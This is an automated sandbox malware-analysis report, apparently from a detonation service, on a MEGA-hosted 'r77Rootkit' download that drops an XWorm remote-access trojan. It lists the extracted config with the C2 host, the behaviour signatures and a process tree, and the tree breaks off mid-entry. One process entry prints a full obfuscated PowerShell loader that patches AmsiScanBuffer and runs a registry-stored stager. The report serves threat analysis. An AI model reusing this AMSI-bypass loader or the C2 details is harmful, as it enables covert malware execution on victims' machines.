Analysis

  • max time kernel
    314s
  • max time network
    324s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/06/2024, 16:18

Errors

Reason
Machine shutdown

General

  • Target

    https://mega.nz/file/77xWCYQA#ZA52VvhCFcGNsJ1Xjtiu8byw8iAVXkFlytq-d4QxYhs

Malware Config

Extracted

Family

xworm

Version

5.0

C2

pa-nitrogen.gl.at.ply.gg:62957

Mutex

bPfKtLDEyKpQvXwZ

Attributes
  • Install_directory

    %Public%

  • install_file

    System.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 11 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 27 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:596
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:68
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8c7f2be3-7826-48b6-b049-f3c544bd2cf7}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5928
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:508
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:888
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1100
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1184
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1196
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                      • Suspicious behavior: GetForegroundWindowSpam
                      PID:3016
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dDxBaWBNIBEL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZjmCwCKhnpyUTe,[Parameter(Position=1)][Type]$BHOXtLSHLX)$UbpjWXepNng=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$UbpjWXepNng.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+'S'+''+[Char](105)+'g'+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZjmCwCKhnpyUTe).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$UbpjWXepNng.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$BHOXtLSHLX,$ZjmCwCKhnpyUTe).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+''+[Char](77)+'an'+'a'+'g'+[Char](101)+'d');Write-Output $UbpjWXepNng.CreateType();}$TdzgnRzIfTXKm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'stem'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+'.'+[Char](87)+'i'+[Char](110)+''+'3'+'2'+'.'+'Un'+'s'+''+[Char](97)+'f'+[Char](101)+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$TwcHSQMxHlduUN=$TdzgnRzIfTXKm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+','+'S'+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YmNFOzuKrYDuwlCgLTM=dDxBaWBNIBEL @([String])([IntPtr]);$lgTfMwidcyIDJuouQHliRq=dDxBaWBNIBEL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kcnISbBOkTY=$TdzgnRzIfTXKm.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+'l'+[Char](108)+'')));$sPPPcrXbhSYmYJ=$TwcHSQMxHlduUN.Invoke($Null,@([Object]$kcnISbBOkTY,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$XgEeOCMVDcsGUjxJJ=$TwcHSQMxHlduUN.Invoke($Null,@([Object]$kcnISbBOkTY,[Object](''+'V'+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$kPpABZJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sPPPcrXbhSYmYJ,$YmNFOzuKrYDuwlCgLTM).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uGMNegZTDmiEdljkx=$TwcHSQMxHlduUN.Invoke($Null,@([Object]$kPpABZJ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+'B'+'uf'+[Char](102)+'e'+[Char](114)+'')));$TzRWgUInll=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgEeOCMVDcsGUjxJJ,$lgTfMwidcyIDJuouQHliRq).Invoke($uGMNegZTDmiEdljkx,[uint32]8,4,[ref]$TzRWgUInll);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uGMNegZTDmiEdljkx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgEeOCMVDcsGUjxJJ,$lgTfMwidcyIDJuouQHliRq).Invoke($uGMNegZTDmiEdljkx,[uint32]8,0x20,[ref]$TzRWgUInll);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+'a'+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5628
                    • C:\Users\Public\System.exe
                      C:\Users\Public\System.exe
                      2⤵
                      • Executes dropped EXE
                      PID:5632
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:956
                      • C:\Users\Public\System.exe
                        C:\Users\Public\System.exe
                        2⤵
                        • Executes dropped EXE
                        PID:6012
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                          • Suspicious use of FindShellTrayWindow
                          PID:5704
                      • C:\Users\Public\System.exe
                        C:\Users\Public\System.exe
                        2⤵
                        • Executes dropped EXE
                        PID:4136
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:3940
                        • C:\Users\Public\System.exe
                          C:\Users\Public\System.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5756
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4820
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1240
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1308
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1320
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1400
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1416
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                      • Modifies registry class
                                      PID:2772
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1556
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1580
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1660
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1672
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1740
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1760
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                • Modifies Internet Explorer settings
                                                PID:1820
                                                • C:\Windows\system32\AUDIODG.EXE
                                                  C:\Windows\system32\AUDIODG.EXE 0x3c0 0x3c8
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2832
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1868
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1876
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1956
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1976
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1864
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2116
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2188
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2288
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2444
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2452
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2608
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2616
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2664
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2692
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2700
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2844
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2996
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:680
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3316
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:3408
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/77xWCYQA#ZA52VvhCFcGNsJ1Xjtiu8byw8iAVXkFlytq-d4QxYhs
                                                                                      2⤵
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:664
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80c8546f8,0x7ff80c854708,0x7ff80c854718
                                                                                        3⤵
                                                                                          PID:4248
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                                                                          3⤵
                                                                                            PID:4088
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                            3⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4728
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
                                                                                            3⤵
                                                                                              PID:1388
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                                                                              3⤵
                                                                                                PID:3928
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                                                                                3⤵
                                                                                                  PID:4844
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:5108
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                    3⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4440
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
                                                                                                    3⤵
                                                                                                      PID:2336
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:3208
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:2672
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:552
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3688 /prefetch:8
                                                                                                            3⤵
                                                                                                              PID:2336
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5940 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:3372
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
                                                                                                                3⤵
                                                                                                                  PID:1180
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                                                  3⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2284
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,14452596333569926177,16606604883140283598,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5380 /prefetch:2
                                                                                                                  3⤵
                                                                                                                    PID:1828
                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\r77Rootkit 1.5.2\" -spe -an -ai#7zMap16573:94:7zEvent10504
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:5448
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\r77Rootkit 1.5.2\XClient.bat" "
                                                                                                                  2⤵
                                                                                                                    PID:5740
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
